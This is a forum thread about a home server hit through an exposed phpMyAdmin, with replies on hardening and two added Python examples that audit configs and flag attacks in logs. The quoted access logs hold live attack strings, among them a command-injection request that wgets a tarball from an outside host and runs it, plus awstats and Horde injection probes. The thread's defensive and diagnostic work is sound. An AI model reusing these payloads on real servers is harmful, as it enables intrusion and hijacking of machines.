# fighting against hackers

## MorpheuS.Ibis

Hi,

I have had my home server hacked (kind of, DDoSed through an old phpmyadmin), and would like to know if/how I can fight back (it seems they didn't get further than apache, so I have logs)

```
94.187.43.174 - - [12/Aug/2009:15:54:35 +0200] "GET //phpmyadmin//config/config.inc.php?c=uptime;uname%20-a HTTP/1.1" 200 192
94.187.1.11 - - [12/Aug/2009:18:10:14 +0200] "GET //phpmyadmin//config/config.inc.php?c=cd%20/tmp;wget%20http://colsaccap.us/flewd.tar;tar%20zxvf%20flewd.tar;rm%20-rf%20flewd.tar;cd%20.b;chmod%20+x%20*;./start.sh HTTP/1.1" 200 202
64.206.161.197 - - [13/Aug/2009:17:22:02 +0200] "GET //phpmyadmin/config/config.inc.php?c=uptime;uname%20-a HTTP/1.0" 200 192
```

Can anyone help? phpmyadmin is already long gone, and I might introduce some hardening techniques.

----------

## krinn

What you are trying to do is illegal in many countries, and the fact that they do illegal stuff to you doesn't legitimize replying in kind.

And you'll end up fighting someone's computer that was hacked and used to bug you, ending up bugging someone's computer that was already fucked up, and not giving any trouble to the real author.

Secure your computer and stop your fool war.

----------

## cach0rr0

Heh... that ain't a DDoS, that's a remote file inclusion vuln.

I'd be curious to see if they were successful wget'ing that file.

And why the hell isn't your phpmyadmin behind .htaccess+.htpasswd? 

They should never even get TO phpmyadmin; they should never get a chance to attack the webapp itself. They should be forced to brute-force a password before they can so much as even attempt to exploit phpmyadmin.

----------

## MorpheuS.Ibis

*cach0rr0 wrote:*

> Heh... that ain't a DDoS, that's a remote file inclusion vuln.
>
> I'd be curious to see if they were successful wget'ing that file.
>
> And why the hell isn't your phpmyadmin behind .htaccess+.htpasswd?
> ...

Yeah, they succeeded; it unpacked some binaries (guess that's why uname went first) and executed them, changing my decent 10mbit connection to 200ms latency with 90% drop (for pings), and IMHO that's DoS (pretty annoying when I am not at home most of the time and use the computer to host my IM and some files).

If you want I can pack the stuff it left and upload it somewhere for study.

Well, I used the phpmyadmin about two times, and since stopped using mysql, so I thought it wouldn't do any harm to leave it lying there (plus I don't have a DNS name pointing to my IP).

And more, I run a hardened kernel, and try all the local root exploits I find, so I thought they couldn't do me something that bad (all of it was running as apache).

----------

## slackline

*krinn wrote:*

> What you are trying to do is illegal in many countries, and the fact that they do illegal stuff to you doesn't legitimize replying in kind.
>
> And you'll end up fighting someone's computer that was hacked and used to bug you, ending up bugging someone's computer that was already fucked up, and not giving any trouble to the real author.
>
> Secure your computer and stop your fool war.

Without further clarification, "fighting back" may simply imply that MorpheuS.Ibis wants to make his system more secure to avoid it happening again.

There was no explicit request or insinuation thereof for how to stage a counter attack (unless the original post has been modified since you responded). More likely a poor choice of wording. Remember not everyone's primary language is English (and even if it is, not everyone uses it correctly).

slack

----------

## cach0rr0

*MorpheuS.Ibis wrote:*

> Yeah, they succeeded; it unpacked some binaries (guess that's why uname went first) and executed them, changing my decent 10mbit connection to 200ms latency with 90% drop (for pings), and IMHO that's DoS (pretty annoying when I am not at home most of the time and use the computer to host my IM and some files).

This is a good reason to have /tmp on a separate mount, as noexec,nosuid.

Also a good idea to have session.save_path set to something besides /tmp, disable file_uploads in PHP for hosts that don't require file uploads - tonnes of miscellaneous PHP hardening stuff to be done. 

Running a hardened kernel protects your apps.

Running apps built with PIE/SSP protects the apps YOU build from being exploited.

But if someone uploads a file to your box, and executes it, the hardened kernel isn't going to provide you heaps of protection. A hardened kernel does NOT remove the need to properly secure your applications; including php, and especially things like phpmyadmin. 

Now, things like grsec policies might prevent this, but most people who just follow the guides don't bother with fine-tuning their grsec policies. They should - it makes a huge difference. 

*Quote:*

> If you want I can pack the stuff it left and upload it somewhere for study.

Nah, pretty sure I know what it was; pretty sure it's SirVic's ssh brute forcer, from the look of things.

*Quote:*

> Well, I used the phpmyadmin about two times, and since stopped using mysql, so I thought it wouldn't do any harm to leave it lying there (plus I don't have a DNS name pointing to my IP).

You should still ALWAYS protect your webapps from direct exploitation via .htaccess/.htpasswd whenever possible; phpmyadmin especially so. 

*Quote:*

> And more, I run a hardened kernel, and try all the local root exploits I find, so I thought they couldn't do me something that bad (all of it was running as apache).

I would boot this from an updated thumb drive and do the usual chkrootkit and rkhunter; even clamav seems to do a decent job of finding this sort of stuff.

Don't trust your kernel. I *never* do if one of my boxes gets compromised in even the smallest fashion. Boot from a thumb drive or CD using a distro that has rkhunter/chkrootkit/clamav updated and included.

----------
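An added example (not cach0rr0's code or any tool of the thread) that checks the three settings recommended above, a separate /tmp mounted noexec,nosuid, file_uploads off where uploads are not needed, and session.save_path moved out of /tmp, against constructed fstab and php.ini samples; the file contents and the finding messages are assumptions of the example.

```python
# Constructed samples: a weak /etc/fstab and php.ini next to hardened versions
# that follow the advice above (separate /tmp mounted noexec,nosuid; uploads off;
# sessions kept out of /tmp). These are not from any real host.
FSTAB_WEAK = "/dev/sda3  /tmp  ext3  defaults  0 2\n"
FSTAB_HARDENED = "tmpfs  /tmp  tmpfs  defaults,noexec,nosuid,nodev  0 0\n"
PHP_INI_WEAK = "file_uploads = On\n; session.save_path left at its default (/tmp)\n"
PHP_INI_HARDENED = "file_uploads = Off\nsession.save_path = /var/lib/php/sessions\n"


def fstab_mount_options(fstab_text, mountpoint):
    """Return the option set for mountpoint, or None if it has no entry of its own."""
    for line in fstab_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 4 and fields[1] == mountpoint:
            return set(fields[3].split(","))
    return None


def php_ini_value(ini_text, key):
    """Return the value of key in php.ini text (comments start with ';'), or None."""
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0]
        if "=" not in line:
            continue
        k, v = (part.strip() for part in line.split("=", 1))
        if k == key:
            return v.strip('"')
    return None


def audit(fstab_text, ini_text, uploads_needed=False):
    """Return the list of failed checks; an empty list means all three pass."""
    findings = []
    opts = fstab_mount_options(fstab_text, "/tmp")
    if opts is None:
        findings.append("/tmp is not a separate mount")
    else:
        missing = {"noexec", "nosuid"} - opts
        if missing:
            findings.append("/tmp lacks " + ",".join(sorted(missing)))
    # PHP ships with file_uploads on, so a missing key counts as enabled.
    uploads = (php_ini_value(ini_text, "file_uploads") or "On").lower()
    if not uploads_needed and uploads not in ("off", "0", "false"):
        findings.append("file_uploads enabled but this host does not need uploads")
    save_path = php_ini_value(ini_text, "session.save_path")
    if save_path is None or save_path == "/tmp" or save_path.startswith("/tmp/"):
        findings.append("session.save_path is /tmp (the default)")
    return findings


if __name__ == "__main__":
    print("weak:", audit(FSTAB_WEAK, PHP_INI_WEAK))
    print("hardened:", audit(FSTAB_HARDENED, PHP_INI_HARDENED))
```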

## Bircoph

Try to use the -j TARPIT iptables target; together with -m limit this is real power. This will turn your firewall into an offensive one; you may completely block any possible network activity from the attacked system. Thanks to this yummy, my server survived dozens of DDoS attacks.

You need to recompile your iptables and some kernel modules (or the kernel itself) to do this. Patches are available via patch-o-matic. Learn this patchset; it will provide you with a lot of powerful tools, not only the TARPIT target.

And do not forget about -m recent module.

----------

## ScarletPimpFromHell

I've noticed that http transport exploit attempts are on the rise with my http server as well, for example ...

```
61.156.31.20 - - [18/Aug/2009:05:11:21] "GET /manager/html HTTP/1.1" 404 274
110.45.146.134 - - [18/Aug/2009:06:33:53] "GET /awstats.pl?configdir=|echo;id%00 HTTP/1.0" 404 272
66.249.65.87 - - [18/Aug/2009:06:37:19] "GET /robots.txt HTTP/1.1" 404 294
202.121.138.74 - - [18/Aug/2009:06:54:22] "GET /awstats.pl?configdir=|echo;id%00 HTTP/1.0" 404 272
202.121.138.74 - - [18/Aug/2009:07:15:21] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;id%00 HTTP/1.0" 404 288
202.121.138.74 - - [18/Aug/2009:08:39:22] "GET /cgi-bin/awstats.pl?configdir=|echo;id%00 HTTP/1.0" 404 280
202.121.138.74 - - [18/Aug/2009:08:43:41] "GET /awstats/awstats.pl?configdir=|echo;id%00 HTTP/1.0" 404 280
202.121.138.74 - - [18/Aug/2009:09:14:33] "GET /horde/services/help/?show=about&module=;%22.passthru(%22id%22); HTTP/1.0" 404 282
91.199.207.60 - - [18/Aug/2009:09:19:33] "GET //phpMyAdmin/ HTTP/1.1" 404 273
91.199.207.60 - - [18/Aug/2009:09:19:34] "GET //phpmyadmin/ HTTP/1.1" 404 273
202.121.138.74 - - [18/Aug/2009:09:22:56] "GET /services/help/?show=about&module=;%22.passthru(%22id%22); HTTP/1.0" 404 276
```

I'm exploring the possibility of creating IPS signatures to shun smacktards that try these exploits. Does anyone know of a comprehensive list or site that documents these exploits?

----------
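A small signature scanner over access-log lines in the format quoted in this thread, as an added example (not the poster's code and not a Snort or mod_security rule set): it percent-decodes each request target so that %00 and %22 are matched as the bytes the CGI or PHP script would have received, applies a handful of constructed rules, and groups hits by source IP. The rule names, the sample lines and the two-hit threshold for listing an IP are assumptions of the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: lines in the same format as the access logs quoted in the thread.
SAMPLE_LOG = [
    '94.187.1.11 - - [12/Aug/2009:18:10:14 +0200] "GET //phpmyadmin//config/config.inc.php?c=cd%20/tmp;wget%20http://colsaccap.us/flewd.tar HTTP/1.1" 200 202',
    '66.249.65.87 - - [18/Aug/2009:06:37:19] "GET /robots.txt HTTP/1.1" 404 294',
    '202.121.138.74 - - [18/Aug/2009:06:54:22] "GET /awstats.pl?configdir=|echo;id%00 HTTP/1.0" 404 272',
    '202.121.138.74 - - [18/Aug/2009:09:14:33] "GET /horde/services/help/?show=about&module=;%22.passthru(%22id%22); HTTP/1.0" 404 282',
    '91.199.207.60 - - [18/Aug/2009:09:19:33] "GET //phpMyAdmin/ HTTP/1.1" 404 273',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})')

# Constructed signatures, run on the percent-decoded target (the bytes the script saw).
SIGNATURES = {
    "shell-metachar-in-query": re.compile(r'\?.*[;|`]'),
    "null-byte": re.compile(r'\x00'),
    "download-or-exec-tool": re.compile(r'\b(wget|curl|chmod|uname)\b'),
    "php-code-injection": re.compile(r'(passthru|shell_exec|system|eval)\s*\('),
    "admin-panel-probe": re.compile(r'(?i)phpmyadmin|/manager/html'),
}

def scan_line(line):
    """Return a finding for one log line, or None if it is clean or unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(m.group("target"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(target)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "target": target, "rules": hits}

def scan_log(lines):
    """All findings for an iterable of log lines, in log order."""
    return [f for f in (scan_line(line) for line in lines) if f]

def offenders(findings, min_hits=2):
    """Source IPs with at least min_hits flagged requests: candidates for a firewall rule."""
    counts = Counter(f["ip"] for f in findings)
    return sorted(ip for ip, n in counts.items() if n >= min_hits)

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], ",".join(f["rules"]))
    print("offenders:", offenders(scan_log(SAMPLE_LOG)))
```

Note that a 404 still counts as a hit: the probe failed here, but the same source is likely to try a path that exists next.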

## cach0rr0

Not offhand, though you could always pilfer sigs from Snort and mod_security.

Just be mindful of the mod_sec stuff; some silly rules (amongst some decent ones, in fairness), and some amateurish, less than speedy regex last I looked.

----------

